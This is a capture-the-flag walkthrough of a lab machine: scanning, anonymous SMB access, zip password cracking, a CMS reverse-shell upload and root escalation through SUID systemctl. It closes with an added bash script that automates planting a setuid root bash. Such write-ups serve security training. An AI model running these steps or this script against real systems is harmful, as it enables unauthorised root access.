I started by scanning the target machine for any open ports and services running on those ports using the Nmap tool.
nmap -p- -A <IP>
We have an Apache server running on port 80. Let's brute-force its directories with gobuster:
gobuster dir --url http://<IP>/ --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x js,php,txt,html -t 100
Let's see what we can find in the Samba shares without a password (-N skips the password prompt):
smbclient -L <IP> -N
There is a Files share. Connect to it, again anonymously, to see what's inside:
smbclient //<IP>/Files -N
Download the archive with : get website.zip. website.zip is password-protected, so let's try to crack it with fcrackzip and the rockyou.txt wordlist (-D dictionary mode, -p wordlist, -u verifies each candidate by actually unzipping):
fcrackzip website.zip -D -p /home/kali/Documents/rockyou.txt -u
README.txt gives us the credentials user : admin and password : jesse for the website kb.vuln. Add kb.vuln to our hosts file, pointing at the target IP (a line of the form <IP> kb.vuln), with the following command :
sudo nano /etc/hosts
Go to http://kb.vuln/ : it's a Sitemagic CMS installation. Log in as admin:jesse.
Upload a PHP reverse shell, with a listener already waiting on the attacking machine :
Then refresh the website to trigger the shell and get a connection back as www-data :
Use the following command to spawn a more complete shell (script allocates a pseudo-terminal, which interactive programs like su and sudo need) :
/usr/bin/script -qc /bin/bash /dev/null
cat user.txt in the home directory gives the first flag :
Now it's time for privilege escalation. Use the following command to search for SUID files (any file with the setuid bit, 4000, set) :
find / -type f -perm /4000 -ls 2>/dev/null
There is a very interesting one : /bin/systemctl. Systemctl is used to examine and control the state of the systemd system and service manager. Because this copy is SUID root, it talks to systemd with root privileges, so any unit we can make systemd start runs as root. Look systemctl up in your favourite SUID-exploitation reference and try to understand how the technique works before running it. The one we use writes a unit file whose ExecStart copies bash into a directory www-data can write to and makes the copy SUID ; let's apply it :
On our www-data shell :
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cp /bin/bash /var/www/html/sitemagic/ && chmod +s /var/www/html/sitemagic/bash"
[Install]
WantedBy=multi-user.target' > /var/www/html/sitemagic/shell.service
Let's link our shell.service into systemd (link needs an absolute path), then enable and start it in one step, and move to the directory where the SUID copy of bash was dropped :
systemctl link /var/www/html/sitemagic/shell.service
systemctl enable --now /var/www/html/sitemagic/shell.service
cd /var/www/html/sitemagic/
And run it with -p so bash keeps the effective root uid instead of dropping it :
./bash -p
cd /root
…well done
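The escalation above is typed in by hand, which is fine for a CTF but leaves out the checks you want in practice: that systemctl really is setuid and root-owned before you bother, and that the dropped bash really is a root-owned setuid binary afterwards (a setuid bash owned by www-data is useless). The script below is an added example, not part of the original write-up or of the target machine; it assumes the same staging directory (/var/www/html/sitemagic, overridable as an argument) and the same unit file layout, and the unit name shell.service is reused from the write-up.

```bash
#!/bin/bash
# Added example: the SUID-systemctl escalation wrapped in pre- and post-checks.
# Assumptions: /bin/systemctl is setuid root and STAGE_DIR is writable by the
# low-privilege user (the CMS webroot in the write-up). Nothing runs until the
# script is invoked as: ./suid_systemctl.sh run [STAGE_DIR]

# Returns 0 when PATH is a regular file with the setuid bit set (any owner).
is_suid() {
    [ -f "$1" ] && [ -u "$1" ]
}

# Returns 0 when PATH is setuid AND owned by root, i.e. actually useful.
is_suid_root() {
    [ -n "$(find "$1" -maxdepth 0 -type f -user root -perm -4000 2>/dev/null)" ]
}

# Prints a oneshot unit that, once systemd (root) starts it, copies /bin/bash
# into STAGE_DIR and sets the setuid bit on the copy.
make_unit() {
    local stage="$1"
    cat <<EOF
[Service]
Type=oneshot
ExecStart=/bin/sh -c "cp /bin/bash ${stage}/bash && chmod u+s ${stage}/bash"
[Install]
WantedBy=multi-user.target
EOF
}

# Same enumeration as the write-up: every setuid file on the box.
list_suid() {
    find / -type f -perm /4000 2>/dev/null
}

exploit() {
    local stage="${1:-/var/www/html/sitemagic}"
    local unit="${stage}/shell.service"

    if ! is_suid_root /bin/systemctl; then
        echo "/bin/systemctl is not setuid root; this path will not work" >&2
        return 1
    fi
    make_unit "$stage" > "$unit" || return 1

    # link needs an absolute path; enable --now starts the unit immediately.
    /bin/systemctl link "$unit" || return 1
    /bin/systemctl enable --now "$unit" || return 1

    if is_suid_root "${stage}/bash"; then
        echo "root-owned setuid bash at ${stage}/bash ; run: ${stage}/bash -p"
    else
        echo "unit ran but no root setuid bash appeared; check: systemctl status shell" >&2
        return 1
    fi
}

if [ "${1:-}" = "run" ]; then
    exploit "${2:-}"
fi
```

The unit uses chmod u+s rather than the write-up's chmod +s: the setuid bit is what matters for bash -p, and leaving setgid off avoids an unnecessary group change. After a successful run, systemctl disable shell and removing the unit file cleans up the persistence you just created.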